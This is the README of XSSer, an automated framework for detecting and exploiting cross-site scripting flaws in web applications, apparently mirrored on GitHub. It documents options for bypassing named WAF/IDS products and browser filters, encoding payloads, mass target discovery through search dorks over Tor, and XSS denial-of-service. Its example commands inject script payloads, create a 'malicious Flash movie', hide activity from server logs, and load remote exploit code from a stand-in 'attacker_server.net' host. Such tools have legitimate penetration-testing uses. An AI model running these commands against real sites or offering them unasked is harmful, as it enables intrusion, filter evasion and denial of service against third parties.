xsser/doc at master · fakegit/xsser · GitHub
Files in doc/: AUTHOR, CHANGELOG, COMMITMENT, COPYING, INSTALL, MANIFESTO, README, requirements.txt

README

================================================================
Introduction:
==============================

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

================================================================
Current Version:
==============================

XSSer v1.8[4]: "The Hiv€!" (2010/2021) // [https://xsser.03c8.net]

================================================================
Options and features:
==============================

Usage:

xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}

Cross Site "Scripter" is an automatic -framework- to detect, exploit and
report XSS vulnerabilities in web-based applications.

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -s, --statistics      show advanced statistics output results
  -v, --verbose         active verbose mode output results
  --gtk                 launch XSSer GTK Interface
  --wizard              start Wizard Helper!

  *Special Features*:
    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
    code embedded. XST allows you to discover if target is vulnerable to
    'Cross Site Tracing' [CAPEC-107]:

    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)

  *Select Target(s)*:
    At least one of these options must to be specified to set the source
    to get target(s) urls from:

    --all=TARGET        Automatically audit an entire target
    -u URL, --url=URL   Enter target to audit
    -i READFILE         Read target(s) urls from file
    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
    -l                  Search from a list of 'dorks'
    --De=DORK_ENGINE    Use this search engine (default: DuckDuckGo)
    --Da                Search massively using all search engines

  *Select type of HTTP/HTTPS Connection(s)*:
    These options can be used to specify which parameter(s) we want to use
    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
    inject:

    -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
    --Cl                Crawl only local target(s) urls (default: FALSE)

  *Configure Request(s)*:
    These options can be used to specify how to connect to the target(s)
    payload(s). You can choose multiple:

    --head              Send a HEAD request before start a test
    --cookie=COOKIE     Change your HTTP Cookie header
    --drop-cookie       Ignore Set-Cookie header from response
    --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default: NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
    --check-tor         Check to see if Tor is used properly
    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
    --ignore-proxy      Ignore system default HTTP proxy
    --timeout=TIMEOUT   Select your timeout (default: 30)
    --retries=RETRIES   Retries when connection timeout (default: 1)
    --threads=THREADS   Maximum number of concurrent requests (default: 5)
    --delay=DELAY       Delay in seconds between each request (default: 0)
    --tcp-nodelay       Use the TCP_NODELAY option
    --follow-redirects  Follow server redirection responses (302)
    --follow-limit=FLI  Set limit for redirection requests (default: 50)

  *Checker Systems*:
    These options are useful to know if your target is using filters
    against XSS attacks:

    --hash              Send a hash to check if target is repeating content
    --heuristic         Discover parameters filtered by using heuristics
    --discode=DISCODE   Set code on reply to discard an injection
    --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
    --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
    --checkatdata=ALD   Check reply using: <alternative payload>
    --reverse-check     Establish a reverse connection from target to XSSer

  *Select Vector(s)*:
    These options can be used to specify injection(s) code. Important if
    you don't want to inject a common XSS vector used by default. Choose
    only one option:

    --payload=SCRIPT    OWN - Inject your own code
    --auto              AUTO - Inject a list of vectors provided by XSSer

  *Select Payload(s)*:
    These options can be used to set the list of vectors provided by
    XSSer. Choose only if required:

    --auto-set=FZZ_NUM  ASET - Limit of vectors to inject (default: 1293)
    --auto-info         AINFO - Select ONLY vectors with INFO (default: FALSE)
    --auto-random       ARAND - Set random to order (default: FALSE)

  *Anti-antiXSS Firewall rules*:
    These options can be used to try to bypass specific WAF/IDS products
    and some anti-XSS browser filters. Choose only if required:

    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
    --Phpids0.7         PHPIDS (0.7) [ALL]
    --Imperva           Imperva Incapsula [ALL]
    --Webknight         WebKnight (4.1) [Chrome]
    --F5bigip           F5 Big IP [Chrome + FF + Opera]
    --Barracuda         Barracuda WAF [ALL]
    --Modsec            Mod-Security [ALL]
    --Quickdefense      QuickDefense [Chrome]
    --Sucuri            SucuriWAF [ALL]
    --Firefox           Firefox 12 [& below]
    --Chrome            Chrome 19 & Firefox 12 [& below]
    --Opera             Opera 10.5 [& below]
    --Iexplorer         IExplorer 9 & Firefox 12 [& below]

  *Select Bypasser(s)*:
    These options can be used to encode vector(s) and try to bypass
    possible anti-XSS filters. They can be combined with other techniques:

    --Str               Use method String.FromCharCode()
    --Une               Use Unescape() function
    --Mix               Mix String.FromCharCode() and Unescape()
    --Dec               Use Decimal encoding
    --Hex               Use Hexadecimal encoding
    --Hes               Use Hexadecimal encoding with semicolons
    --Dwo               Encode IP addresses with DWORD
    --Doo               Encode IP addresses with Octal
    --Cem=CEM           Set different 'Character Encoding Mutations'
                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')

  *Special Technique(s)*:
    These options can be used to inject code using different XSS
    techniques and fuzzing vectors. You can choose multiple:

    --Coo               COO - Cross Site Scripting Cookie injection
    --Xsa               XSA - Cross Site Agent Scripting
    --Xsr               XSR - Cross Site Referer Scripting
    --Dcp               DCP - Data Control Protocol injections
    --Dom               DOM - Document Object Model injections
    --Ind               IND - HTTP Response Splitting Induced code

  *Select Final injection(s)*:
    These options can be used to specify the final code to inject on
    vulnerable target(s). Important if you want to exploit 'on-the-wild'
    the vulnerabilities found. Choose only one option:

    --Fp=FINALPAYLOAD   OWN - Exploit your own code
    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-

  *Special Final injection(s)*:
    These options can be used to execute some 'special' injection(s) on
    vulnerable target(s). You can select multiple and combine them with
    your final code (except with DCP exploits):

    --Anchor            ANC - Use 'Anchor Stealth' payloader (DOM shadows!)
    --B64               B64 - Base64 code encoding in META tag (rfc2397)
    --Onm               ONM - Use onMouseMove() event
    --Ifr               IFR - Use <iframe> source tag
    --Dos               DOS - XSS (client) Denial of Service
    --Doss              DOSs - XSS (server) Denial of Service

  *Reporting*:
    --save              Export to file (XSSreport.raw)
    --xml=FILEXML       Export to XML (--xml file.xml)

  *Miscellaneous*:
    --silent            Inhibit console output results
    --alive=ISALIVE     Set limit of errors before check if target is alive
    --update            Check for latest stable version

================================================================
Commands and examples:
==============================

----------------------------------------

* View HELP (available commands):

  xsser -h (--help)

----------------------------------------

* Check for latest stable version:

  xsser --update

----------------------------------------

* Launch GTK interface (GUI):

  xsser --gtk

----------------------------------------

* Simple injection from URL:

  xsser -u "https://target.com/XSS"

----------------------------------------

* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers:

  xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"

----------------------------------------

* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:

  xsser -u "https://target.com/XSS" --auto --reverse-check -s

----------------------------------------

* Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):

  xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save

----------------------------------------

* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

  xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"

----------------------------------------

* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:

  xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une

----------------------------------------

* Injection from Dork, selecting "DuckDuckGo" as search engine:

  xsser --De "duck" -d "search.php?q="

----------------------------------------

* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):

  xsser -l --Da

----------------------------------------

* Injection from Crawler with depth 2 and 200 pages to review (XSSer Spider!):

  xsser -c 200 --Cw=2 -u "https://target.com"

----------------------------------------

* Simple injection from URL, to a POST parameter (ex: password), with statistics results:

  xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s

----------------------------------------

* Multiple injections (with hex and int hashes) to multiple parameters on a single URL, using GET:

  xsser -u "https://target.com" -g "login.php?username=XSS&password=XSS&captcha=X1S" --auto

----------------------------------------

* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and, if any vulnerability exists, exploiting your -own- final code:

  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Anchor --Fp="<script>alert('XSSed');</script>"

----------------------------------------

* Simple injection from URL, using GET and, if any vulnerability exists, exploiting a DoS (Denial of Service):

  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos

----------------------------------------

* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!):

  xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose

----------------------------------------

* Injection of XSS code provided by the user on a -fake- image (ready to be uploaded to your public profile):

  xsser --imx "test.png" --payload="<script>alert('XSSed');</script>"

----------------------------------------

* Report dorking search (using all search engines) to an XML file:

  xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml"

----------------------------------------

* Create a malicious Flash movie:

  xsser --fla "INFECTED_movie.swf"

----------------------------------------

* Send a pre-checking hash to search for false -false positives-:

  xsser -u "https://target.com" --hash

----------------------------------------

* Discover parameters filtered on your target using heuristics:

  xsser -u "https://target.com" --heuristic

----------------------------------------

* Exploiting Base64 code encoding in META tag (rfc2397), just after injecting a manual payload:

  xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64

----------------------------------------

* Exploiting your "own" -remote code- after discovering a vulnerability using automatic fuzzing:

  xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"

----------------------------------------

* Apply Anti-antiXSS bypassers (ex: Imperva) before injecting your -own- code, with verbose output:

  xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v

----------------------------------------

* Search also "XSSer" on the Internet for more videos and tutorials...

  [...]